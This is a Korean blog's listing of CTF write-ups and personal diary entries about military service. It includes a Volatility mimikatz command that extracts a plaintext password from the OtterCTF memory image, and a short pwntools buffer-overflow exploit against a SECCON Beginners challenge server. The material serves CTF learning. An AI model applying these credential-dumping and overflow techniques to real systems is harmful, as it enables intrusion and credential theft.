목록전체 글 (67)
Hack4S3cur1ty
volatility의 mimikatz플러그인을 이용하여 쉽게 풀 수 있다. 123456>vol.py -f OtterCTF.vmem --profile=Win7SP1x64 mimikatzVolatility Foundation Volatility Framework 2.6Module User Domain Password-------- ---------------- ---------------- ----------------------------------------wdigest Rick WIN-LO6FAF3DTFE MortyIsReallyAnOtterwdigest WIN-LO6FAF3DTFE$ WORKGROUPColored by Color Scriptercs
앞으로는 2018년에 참여했던 CTF들에 대한 풀이를 작성해보려고 한다. 예전에 한번 시도 했었는데 꾸준히 올리는게 생각보다 쉽지 않았었다.또한 풀었던 문제지만 시간이 지나고 다시 풀어보니 잘 안풀리는 문제도 있었다. 그래서 복습 겸 다시 시도해보려고 한다.
군 입대한지 벌써 3개월이 넘어가고 있다. 나름대로 군생활은 잘 하고 있는거같다.업무도 쓱싹 배우고 업무 자동화 코드도 짜서 유용하게 사용하고 있다. 군생활 보다는 CTF를 못하는게 가장 힘든거같다. 내가 생각하는 CTF는 최신동향이라 한번 놓치면 못따라가는 느낌이 있는데,입대 이후로 CTF를 제대로 해본적이 없다. 사실 할 수가 없다. 사지방에서라도 1~2시간 해보려고 노력해보고 있다. 일과가 끝나고 아무것도 안하고 TV만 보니 점점 멍청이가 되는거같아서,책을 구입하여 그동안 부족하다고 생각했던 기초적인 부분들을 공부하고,자격증 관련된 책도 사서 자격증도 준비하고,평소에 잘 읽지 않던 시집도 읽으려고 하고 있다. 1줄로 요약하면 2년이라는 시간을 그냥 허송세월 보내지 않으려고 노력하고 있다.
최근 $wag 팀과 함께 굉장히 많은 CTF를 나갔지만 귀찮아서 풀이를 올리지 않았었다. 군대갈 날(6월 25일)이 얼마 남지 않으니 심심해서 오랜만에 글을 썼다. 다른 CTF 풀이도 쓰고 싶은데 기억이 잘 안나서 못쓰겠다. 다음 CTF는 Security Fest인데 문제를 푼다면 풀이를 써야겠다.
문제 이름이 condition 이길래 race condition인줄 알았는데 바이너리를 까보니 그냥 0xDEADBEEF를 만족하면 플래그를 준다. gets로 간단하게 BOF가 가능하다. 12345678910from pwn import * s = remote('pwn1.chall.beginners.seccon.jp', 16268) payload = 'A' * 0x2cpayload +='\xef\xbe\xad\xde' s.send(payload + '\n') s.interactive()Colored by Color Scriptercs